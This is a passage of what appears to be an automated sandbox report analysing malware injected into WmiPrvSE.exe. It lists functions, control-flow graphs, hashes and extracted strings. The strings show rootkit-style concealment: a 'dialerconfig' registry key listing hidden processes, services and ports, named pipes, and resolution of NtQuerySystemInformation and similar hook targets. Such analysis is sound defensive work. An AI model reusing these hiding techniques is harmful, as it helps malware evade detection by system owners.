                                                                    • Instruction ID: 39d69f7b874f15cce44bd49a02fbcbc63cb0ee356c3901d629f3a2bd892f889a
                                                                    • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                    • Instruction Fuzzy Hash: E4D0A760311645AAFF74FFE688CE7B02398EB06754FC85020C90441D58DB18898EDB10
                                                                    Function 000002246443273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction ID: ec08dc463c630cc2b47acb51ee02cfd31d10c6835a0ec07b7f99b5467f947d34
                                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction Fuzzy Hash: 67613532B0169097DF69EF56A0057BDB39AFB55FA8F988121CE0907B8CCE34D852C780

                                                                    Non-executed Functions

                                                                    Function 0000022464462B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 367 22464462b2c-22464462ba5 call 22464482ce0 370 22464462bab-22464462bb1 367->370 371 22464462ee0-22464462f03 367->371 370->371 372 22464462bb7-22464462bba 370->372 372->371 373 22464462bc0-22464462bc3 372->373 373->371 374 22464462bc9-22464462bd9 GetModuleHandleA 373->374 375 22464462bdb-22464462beb call 22464476090 374->375 376 22464462bed 374->376 378 22464462bf0-22464462c0e 375->378 376->378 378->371 381 22464462c14-22464462c33 StrCmpNIW 378->381 381->371 382 22464462c39-22464462c3d 381->382 382->371 383 22464462c43-22464462c4d 382->383 383->371 384 22464462c53-22464462c5a 383->384 384->371 385 22464462c60-22464462c73 384->385 386 22464462c75-22464462c81 385->386 387 22464462c83 385->387 388 22464462c86-22464462c8a 386->388 387->388 389 22464462c9a 388->389 390 22464462c8c-22464462c98 388->390 391 22464462c9d-22464462ca7 389->391 390->391 392 22464462d9d-22464462da1 391->392 393 22464462cad-22464462cb0 391->393 396 22464462da7-22464462daa 392->396 397 22464462ed2-22464462eda 392->397 394 22464462cc2-22464462ccc 393->394 395 22464462cb2-22464462cbf call 2246446199c 393->395 399 22464462d00-22464462d0a 394->399 400 22464462cce-22464462cdb 394->400 395->394 401 22464462dbb-22464462dc5 396->401 402 22464462dac-22464462db8 call 2246446199c 396->402 397->371 397->385 407 22464462d3a-22464462d3d 399->407 408 22464462d0c-22464462d19 399->408 400->399 406 22464462cdd-22464462cea 400->406 403 22464462dc7-22464462dd4 401->403 404 22464462df5-22464462df8 401->404 402->401 403->404 413 22464462dd6-22464462de3 403->413 414 22464462dfa-22464462e03 call 22464461bbc 404->414 415 22464462e05-22464462e12 lstrlenW 404->415 416 22464462ced-22464462cf3 406->416 410 22464462d4b-22464462d58 lstrlenW 407->410 411 22464462d3f-22464462d49 call 22464461bbc 407->411 408->407 417 22464462d1b-22464462d28 408->417 419 22464462d5a-22464462d64 410->419 420 22464462d7b-22464462d8d call 22464463844 410->420 411->410 424 22464462d93-22464462d98 411->424 421 22464462de6-22464462dec 413->421 414->415 431 22464462e4a-22464462e55 414->431 425 22464462e14-22464462e1e 415->425 426 22464462e35-22464462e3f call 22464463844 415->426 423 22464462cf9-22464462cfe 416->423 416->424 427 22464462d2b-22464462d31 417->427 419->420 430 22464462d66-22464462d79 call 2246446152c 419->430 420->424 435 22464462e42-22464462e44 420->435 421->431 432 22464462dee-22464462df3 421->432 423->399 423->416 424->435 425->426 436 22464462e20-22464462e33 call 2246446152c 425->436 426->435 427->424 437 22464462d33-22464462d38 427->437 430->420 430->424 439 22464462e57-22464462e5b 431->439 440 22464462ecc-22464462ed0 431->440 432->404 432->421 435->397 435->431 436->426 436->431 437->407 437->427 444 22464462e63-22464462e7d call 224644685c0 439->444 445 22464462e5d-22464462e61 439->445 440->397 448 22464462e80-22464462e83 444->448 445->444 445->448 451 22464462ea6-22464462ea9 448->451 452 22464462e85-22464462ea3 call 224644685c0 448->452 451->440 454 22464462eab-22464462ec9 call 224644685c0 451->454 452->451 454->440
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                    • API String ID: 2119608203-3850299575
                                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction ID: af08292f66216871cd85cec39f1d071454b18b8a938ee9b2adbf9e046eb78b97
                                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction Fuzzy Hash: 1AB1AB62310A50B2EFB4BFA5D44A7F963A9F746B84F845026EE4953F98DF34C880CB40
                                                                    Function 0000022464467D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3140674995-0
                                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction ID: 928689e077b8d1e464e71ac0603b4a859ae22e107b8d212e9ea3e8ec6c0fcc30
                                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction Fuzzy Hash: D4314C72305B809AEBB0AFA0E8453ED7369F786754F84442ADB4D47A98EF38C549CB10
                                                                    Function 000002246446D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction ID: 37c9148f579ccd55c50dade72aae745424bbef6147a262b77b982cc568d3b65c
                                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction Fuzzy Hash: 40315132314B8096EB70EF65E8453AE73A8F78A764F900126EA9D43F58DF38C546CB00
                                                                    Function 0000022464461628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                    • API String ID: 106492572-2879589442
                                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction ID: 321fd50596de88ef4081d745272f011c1d179d5784aa8c7fbd8b2983ea7a7178
                                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction Fuzzy Hash: 52713D36310A50A6EF60EFA5E84A66937A9F786B9CF802111DD4E53F2DDF34C445C740
                                                                    Function 00000224644612BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                    • String ID: d
                                                                    • API String ID: 2005889112-2564639436
                                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction ID: a280a44295b083bb77bdd0415179f3ea07f640493acd7725c0faa70d909d99ee
                                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction Fuzzy Hash: 06513D36200B8496EB64DFA2E54E36A77A6F78ABD5F844124DE4907B5DDF3CC446CB00
                                                                    Function 0000022464461D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                    • API String ID: 4175298099-1975688563
                                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction ID: 1788f5aae779ab4ba702212cd81ee87479c54fc5623d5a9467859f99709f2d18
                                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction Fuzzy Hash: F831A3A861094AB0EFA4FFE5E85B6F4272CB716354FC05013D40912D6E9F78C24ACB50
                                                                    Function 0000022464436910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 209 22464436910-22464436916 210 22464436918-2246443691b 209->210 211 22464436951-2246443695b 209->211 212 22464436945-22464436984 call 22464436fc0 210->212 213 2246443691d-22464436920 210->213 214 22464436a78-22464436a8d 211->214 232 2246443698a-2246443699f call 22464436e54 212->232 233 22464436a52 212->233 215 22464436938 __scrt_dllmain_crt_thread_attach 213->215 216 22464436922-22464436925 213->216 217 22464436a8f 214->217 218 22464436a9c-22464436ab6 call 22464436e54 214->218 224 2246443693d-22464436944 215->224 220 22464436927-22464436930 216->220 221 22464436931-22464436936 call 22464436f04 216->221 222 22464436a91-22464436a9b 217->222 230 22464436ab8-22464436aed call 22464436f7c call 22464436e1c call 22464437318 call 22464437130 call 22464437154 call 22464436fac 218->230 231 22464436aef-22464436b20 call 22464437190 218->231 221->224 230->222 243 22464436b22-22464436b28 231->243 244 22464436b31-22464436b37 231->244 241 224644369a5-224644369b6 call 22464436ec4 232->241 242 22464436a6a-22464436a77 call 22464437190 232->242 237 22464436a54-22464436a69 233->237 259 22464436a07-22464436a11 call 22464437130 241->259 260 224644369b8-224644369dc call 224644372dc call 22464436e0c call 22464436e38 call 2246443ac0c 241->260 242->214 243->244 248 22464436b2a-22464436b2c 243->248 249 22464436b39-22464436b43 244->249 250 22464436b7e-22464436b94 call 2246443268c 244->250 255 22464436c1f-22464436c2c 248->255 256 22464436b45-22464436b4d 249->256 257 22464436b4f-22464436b5d call 22464445780 249->257 270 22464436b96-22464436b98 250->270 271 22464436bcc-22464436bce 250->271 262 22464436b63-22464436b78 call 22464436910 256->262 257->262 274 22464436c15-22464436c1d 257->274 259->233 282 22464436a13-22464436a1f call 22464437180 259->282 260->259 312 224644369de-224644369e5 __scrt_dllmain_after_initialize_c 260->312 262->250 262->274 270->271 279 22464436b9a-22464436bbc call 2246443268c call 22464436a78 270->279 272 22464436bd5-22464436bea call 22464436910 271->272 273 22464436bd0-22464436bd3 271->273 272->274 291 22464436bec-22464436bf6 272->291 273->272 273->274 274->255 279->271 306 22464436bbe-22464436bc6 call 22464445780 279->306 299 22464436a45-22464436a50 282->299 300 22464436a21-22464436a2b call 22464437098 282->300 296 22464436bf8-22464436bff 291->296 297 22464436c01-22464436c11 call 22464445780 291->297 296->274 297->274 299->237 300->299 311 22464436a2d-22464436a3b 300->311 306->271 311->299 312->259 313 224644369e7-22464436a04 call 2246443abc8 312->313 313->259
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                    • API String ID: 190073905-1786718095
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: c5e5026ddf3eacff28e83724ae7f914e94cad23a476c1b3517702b24e7bf08ed
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 2C81C131600643A6FE76BBE7944B37922DCEB87F84FD4A0259A4547F9EDB38C8458B00
                                                                    Function 000002246446CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 000002246446CE37
                                                                    • FlsGetValue.KERNEL32(?,?,?,0000022464470A6B,?,?,?,000002246447045C,?,?,?,000002246446C84F), ref: 000002246446CE4C
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000022464470A6B,?,?,?,000002246447045C,?,?,?,000002246446C84F), ref: 000002246446CE6D
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000022464470A6B,?,?,?,000002246447045C,?,?,?,000002246446C84F), ref: 000002246446CE9A
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000022464470A6B,?,?,?,000002246447045C,?,?,?,000002246446C84F), ref: 000002246446CEAB
                                                                    • FlsSetValue.KERNEL32(?,?,?,0000022464470A6B,?,?,?,000002246447045C,?,?,?,000002246446C84F), ref: 000002246446CEBC
                                                                    • SetLastError.KERNEL32 ref: 000002246446CED7
                                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000022464470A6B,?,?,?,000002246447045C,?,?,?,000002246446C84F), ref: 000002246446CF0D
                                                                    • FlsSetValue.KERNEL32(?,?,00000001,000002246446ECCC,?,?,?,?,000002246446BF9F,?,?,?,?,?,0000022464467AB0), ref: 000002246446CF2C
                                                                      • Part of subcall function 000002246446D6CC: HeapAlloc.KERNEL32 ref: 000002246446D721
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000022464470A6B,?,?,?,000002246447045C,?,?,?,000002246446C84F), ref: 000002246446CF54
                                                                      • Part of subcall function 000002246446D744: HeapFree.KERNEL32 ref: 000002246446D75A
                                                                      • Part of subcall function 000002246446D744: GetLastError.KERNEL32 ref: 000002246446D764
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000022464470A6B,?,?,?,000002246447045C,?,?,?,000002246446C84F), ref: 000002246446CF65
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000022464470A6B,?,?,?,000002246447045C,?,?,?,000002246446C84F), ref: 000002246446CF76
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 570795689-0
                                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction ID: 03115f8062b5548c19d8f9fe4fbfa3748beb1b3edc853103c0d7fa10d303cf4e
                                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction Fuzzy Hash: 2441946030134465FEF8B7F5995F379225E5B5B7B0FE40725A83646EDEDE68D4018E00
                                                                    Function 0000022464462244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                    • API String ID: 2171963597-1373409510
                                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction ID: ea21199c2ca28fa234886e2dc41e3930e2208e3fef81b27d52ee5f843bef7b7a
                                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction Fuzzy Hash: 7C213D36614740A2FB20EB65E54936977A5F78ABA4F901215EA5902EACCF3CC14ACF00
                                                                    Function 0000022464439944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 467 22464439944-224644399ac call 2246443a814 470 22464439e13-22464439e1b call 2246443bb48 467->470 471 224644399b2-224644399b5 467->471 471->470 472 224644399bb-224644399c1 471->472 474 224644399c7-224644399cb 472->474 475 22464439a90-22464439aa2 472->475 474->475 479 224644399d1-224644399dc 474->479 477 22464439aa8-22464439aac 475->477 478 22464439d63-22464439d67 475->478 477->478 482 22464439ab2-22464439abd 477->482 480 22464439d69-22464439d70 478->480 481 22464439da0-22464439daa call 22464438a34 478->481 479->475 483 224644399e2-224644399e7 479->483 480->470 484 22464439d76-22464439d9b call 22464439e1c 480->484 481->470 494 22464439dac-22464439dcb call 22464436d40 481->494 482->478 486 22464439ac3-22464439aca 482->486 483->475 487 224644399ed-224644399f7 call 22464438a34 483->487 484->481 490 22464439c94-22464439ca0 486->490 491 22464439ad0-22464439b07 call 22464438e10 486->491 487->494 498 224644399fd-22464439a28 call 22464438a34 * 2 call 22464439124 487->498 490->481 495 22464439ca6-22464439caa 490->495 491->490 503 22464439b0d-22464439b15 491->503 500 22464439cba-22464439cc2 495->500 501 22464439cac-22464439cb8 call 224644390e4 495->501 535 22464439a2a-22464439a2e 498->535 536 22464439a48-22464439a52 call 22464438a34 498->536 500->481 502 22464439cc8-22464439cd5 call 22464438cb4 500->502 501->500 515 22464439cdb-22464439ce3 501->515 502->481 502->515 508 22464439b19-22464439b4b 503->508 512 22464439c87-22464439c8e 508->512 513 22464439b51-22464439b5c 508->513 512->490 512->508 513->512 516 22464439b62-22464439b7b 513->516 517 22464439df6-22464439e12 call 22464438a34 * 2 call 2246443baa8 515->517 518 22464439ce9-22464439ced 515->518 520 22464439c74-22464439c79 516->520 521 22464439b81-22464439bc6 call 224644390f8 * 2 516->521 517->470 522 22464439cef-22464439cfe call 224644390e4 518->522 523 22464439d00 518->523 526 22464439c84 520->526 548 22464439c04-22464439c0a 521->548 549 22464439bc8-22464439bee call 224644390f8 call 2246443a038 521->549 531 22464439d03-22464439d0d call 2246443a8ac 522->531 523->531 526->512 531->481 546 22464439d13-22464439d61 call 22464438d44 call 22464438f50 531->546 535->536 540 22464439a30-22464439a3b 535->540 536->475 552 22464439a54-22464439a74 call 22464438a34 * 2 call 2246443a8ac 536->552 540->536 545 22464439a3d-22464439a42 540->545 545->470 545->536 546->481 553 22464439c7b 548->553 554 22464439c0c-22464439c10 548->554 568 22464439c15-22464439c72 call 22464439870 549->568 569 22464439bf0-22464439c02 549->569 573 22464439a76-22464439a80 call 2246443a99c 552->573 574 22464439a8b 552->574 559 22464439c80 553->559 554->521 559->526 568->559 569->548 569->549 577 22464439a86-22464439def call 224644386ac call 2246443a3f4 call 224644388a0 573->577 578 22464439df0-22464439df5 call 2246443baa8 573->578 574->475 577->578 578->517
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366797216.0000022464430000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022464430000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464430000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction ID: 753e77d2522ca88a5869fa569f641d44acc0dc8f8c401e930d1a77a7b0559a5e
                                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction Fuzzy Hash: C7E19C72604B809AEF71AFA6D48A3AD77A8F746F98F900105EE8957F99CF35D190C700
                                                                    Function 000002246446A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 588 2246446a544-2246446a5ac call 2246446b414 591 2246446a5b2-2246446a5b5 588->591 592 2246446aa13-2246446aa1b call 2246446c748 588->592 591->592 594 2246446a5bb-2246446a5c1 591->594 596 2246446a5c7-2246446a5cb 594->596 597 2246446a690-2246446a6a2 594->597 596->597 598 2246446a5d1-2246446a5dc 596->598 599 2246446a6a8-2246446a6ac 597->599 600 2246446a963-2246446a967 597->600 598->597 602 2246446a5e2-2246446a5e7 598->602 599->600 601 2246446a6b2-2246446a6bd 599->601 603 2246446a969-2246446a970 600->603 604 2246446a9a0-2246446a9aa call 22464469634 600->604 601->600 605 2246446a6c3-2246446a6ca 601->605 602->597 606 2246446a5ed-2246446a5f7 call 22464469634 602->606 603->592 607 2246446a976-2246446a99b call 2246446aa1c 603->607 604->592 616 2246446a9ac-2246446a9cb call 22464467940 604->616 609 2246446a894-2246446a8a0 605->609 610 2246446a6d0-2246446a707 call 22464469a10 605->610 606->616 621 2246446a5fd-2246446a628 call 22464469634 * 2 call 22464469d24 606->621 607->604 609->604 617 2246446a8a6-2246446a8aa 609->617 610->609 625 2246446a70d-2246446a715 610->625 618 2246446a8ba-2246446a8c2 617->618 619 2246446a8ac-2246446a8b8 call 22464469ce4 617->619 618->604 624 2246446a8c8-2246446a8d5 call 224644698b4 618->624 619->618 632 2246446a8db-2246446a8e3 619->632 656 2246446a62a-2246446a62e 621->656 657 2246446a648-2246446a652 call 22464469634 621->657 624->604 624->632 630 2246446a719-2246446a74b 625->630 634 2246446a887-2246446a88e 630->634 635 2246446a751-2246446a75c 630->635 637 2246446a8e9-2246446a8ed 632->637 638 2246446a9f6-2246446aa12 call 22464469634 * 2 call 2246446c6a8 632->638 634->609 634->630 635->634 639 2246446a762-2246446a77b 635->639 641 2246446a900 637->641 642 2246446a8ef-2246446a8fe call 22464469ce4 637->642 638->592 643 2246446a874-2246446a879 639->643 644 2246446a781-2246446a7c6 call 22464469cf8 * 2 639->644 652 2246446a903-2246446a90d call 2246446b4ac 641->652 642->652 648 2246446a884 643->648 671 2246446a7c8-2246446a7ee call 22464469cf8 call 2246446ac38 644->671 672 2246446a804-2246446a80a 644->672 648->634 652->604 664 2246446a913-2246446a961 call 22464469944 call 22464469b50 652->664 656->657 662 2246446a630-2246446a63b 656->662 657->597 670 2246446a654-2246446a674 call 22464469634 * 2 call 2246446b4ac 657->670 662->657 668 2246446a63d-2246446a642 662->668 664->604 668->592 668->657 694 2246446a68b 670->694 695 2246446a676-2246446a680 call 2246446b59c 670->695 688 2246446a815-2246446a872 call 2246446a470 671->688 689 2246446a7f0-2246446a802 671->689 676 2246446a87b 672->676 677 2246446a80c-2246446a810 672->677 682 2246446a880 676->682 677->644 682->648 688->682 689->671 689->672 694->597 698 2246446a686-2246446a9ef call 224644692ac call 2246446aff4 call 224644694a0 695->698 699 2246446a9f0-2246446a9f5 call 2246446c6a8 695->699 698->699 699->638
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction ID: 2e3ec290c38825a87ce3037b71d6548a777fc4a6c68d2cf01a2b13652e3947e9
                                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction Fuzzy Hash: E2E17F72704B5096EFB0EFA5944A3AD77A8FB46798F900516EE8967F99CB34C481CB00
                                                                    Function 000002246446F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3366872392.0000022464460000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022464460000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_22464460000_WmiPrvSE.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3013587201-537541572
                                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction ID: 972e152defcc8fd5eb100a4006694fc57d880e4a226c056782977f9daa240cc5
                                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction Fuzzy Hash: 0E41D622316A0061EF75EF96A80A775239AF757BE0F854125DD4E87F8CDE38C4458740
                                                                    Function 000002246446104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
